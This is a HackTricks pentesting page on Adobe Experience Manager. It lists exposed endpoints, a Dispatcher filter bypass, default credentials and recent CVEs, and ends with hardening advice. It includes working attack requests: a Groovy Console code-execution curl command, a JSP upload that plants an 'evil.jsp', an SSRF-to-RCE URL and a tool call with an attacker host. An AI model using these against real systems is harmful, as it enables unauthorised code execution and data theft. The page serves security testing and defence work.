maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.md

123 lines
5.5 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# AEM (Adobe Experience Manager) Pentesting
{{#include ../../banners/hacktricks-training.md}}
> Adobe Experience Manager (AEM, part of the Adobe Experience Cloud) is an enterprise CMS that runs on top of Apache Sling/Felix (OSGi) and a Java Content Repository (JCR).
> From an attacker perspective AEM instances very often expose dangerous development endpoints, weak Dispatcher rules, default credentials and a long tail of CVEs that are patched every quarter.
The checklist below focuses on **externally reachable (unauth) attack surface** that keeps showing up in real engagements (2022-2025).
---
## 1. Fingerprinting
```
$ curl -s -I https://target | egrep -i "aem|sling|cq"
X-Content-Type-Options: nosniff
X-Dispatcher: hu1 # header added by AEM Dispatcher
X-Vary: Accept-Encoding
```
Other quick indicators:
* `/etc.clientlibs/` static path present (returns JS/CSS).
* `/libs/granite/core/content/login.html` login page with the “Adobe Experience Manager” banner.
* `</script><!--/* CQ */-->` comment at the bottom of HTML.
---
## 2. High-value unauthenticated endpoints
Path | What you get | Notes
---- | ------------- | -----
`/.json`, `/.1.json` | JCR nodes via **DefaultGetServlet** | Often blocked, but *Dispatcher bypass* (see below) works.
`/bin/querybuilder.json?path=/` | QueryBuilder API | Leak of page tree, internal paths, user names.
`/system/console/status-*`, `/system/console/bundles` | OSGi/Felix console | 403 by default; if exposed & creds found ⇒ bundle-upload RCE.
`/crx/packmgr/index.jsp` | Package Manager | Allows authenticated content packages → JSP payload upload.
`/etc/groovyconsole/**` | AEM Groovy Console | If exposed → arbitrary Groovy / Java execution.
`/libs/cq/AuditlogSearchServlet.json` | Audit logs | Information disclosure.
`/libs/cq/ui/content/dumplibs.html` | ClientLibs dump | XSS vector.
### Dispatcher bypass trick
Most production sites sit behind the *Dispatcher* (reverse-proxy). Its filter rules can be bypassed by appending an allowed static extension **after a semicolon or encoded newline**:
```
GET /bin/querybuilder.json;%0aa.css?path=/home&type=rep:User HTTP/1.1
```
A single request like above frequently discloses user profile nodes with email addresses. P-T Partners published good guidance on this weakness. 【】
---
## 3. Common misconfigurations (still alive in 2025)
1. **Anonymous POST servlet** `POST /.json` with `:operation=import` lets you plant new JCR nodes. Blocking `*.json` POST in the Dispatcher fixes it. 【】
2. **World-readable user profiles** default ACL grants `jcr:read` on `/home/users/**/profile/*` to everyone.
3. **Default credentials** `admin:admin`, `author:author`, `replication:replication`.
4. **WCMDebugFilter** enabled ⇒ reflected XSS via `?debug=layout` (CVE-2016-7882, still found on legacy 6.4 installs).
5. **Groovy Console exposed** remote code execution by sending a Groovy script:
```bash
curl -u admin:admin -d 'script=println "pwn".execute()' https://target/bin/groovyconsole/post.json
```
---
## 4. Recent vulnerabilities (service-pack cadence)
Quarter | CVE | Affected | Impact
------- | --- | -------- | ------
Dec 2024 | **CVE-2024-43711** | 6.5.21 and earlier | Improper input validation → **Arbitrary code execution** (requires low-priv auth). 【】
Dec 2024 | CVE-2024-43724/26 | 6.5.21 and earlier | DOM / Stored XSS in Move Page Wizard. 【】
Dec 2023 | CVE-2023-48452/68 | ≤ 6.5.18 | DOM-based XSS via crafted URL. 【】
Dec 2022 | CVE-2022-30683 | ≤ 6.5.13 | Crypto design flaw → secret decryption (needs low-priv creds). 【】
Always check the *APSB* bulletin matching the customers service-pack and request the latest **6.5.22** or *Cloud Service 2024.11*.
---
## 5. Exploitation snippets
### 5.1 RCE via dispatcher bypass + JSP upload
If anonymous write is possible:
```
# 1. Create a node that will become /content/evil.jsp
POST /content/evil.jsp;%0aa.css HTTP/1.1
Content-Type: application/x-www-form-urlencoded
:contentType=text/plain
jcr:data=<% out.println("pwned"); %>
:operation=import
```
Now request `/content/evil.jsp` the JSP runs with the AEM process user.
### 5.2 SSRF to RCE (historical < 6.3)
`/libs/mcm/salesforce/customer.html;%0aa.css?checkType=authorize&authorization_url=http://127.0.0.1:4502/system/console`
`aem_ssrf2rce.py` from **aem-hacker** automates the full chain. 【】
---
## 6. Tooling
* **aem-hacker** Swiss-army enumeration script, supports dispatcher bypass, SSRF detection, default-creds checks and more.
```bash
python3 aem_hacker.py -u https://target --host attacker-ip
```【】
* **Content Brute-force** recursively request `/_jcr_content.(json|html)` to discover hidden components.
* **osgi-infect** upload malicious OSGi bundle via `/system/console/bundles` if creds available.
---
## 7. Hardening checklist (for your reports recommendations)
1. Keep instance on the **latest cumulative service pack** (as of Jul 2025: 6.5.22).
2. Remove/rotate default accounts; enforce SSO/SAML.
3. Tighten **Dispatcher filters** deny `;`, encoded newlines, and `*.json` or `*.querybuilder.json` for anonymous users.
4. Disable or protect consoles (`/system/console`, `/crx/*`, `/etc/groovyconsole`) with IP allow-lists.
5. Apply the *Anonymous Permission Hardening* package shipped by Adobe.
## References
* Adobe Security Bulletin APSB24-69 “Security updates for Adobe Experience Manager (Dec 2024)”.
* 0ang3el aem-hacker tool (GitHub).
{{#include ../../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink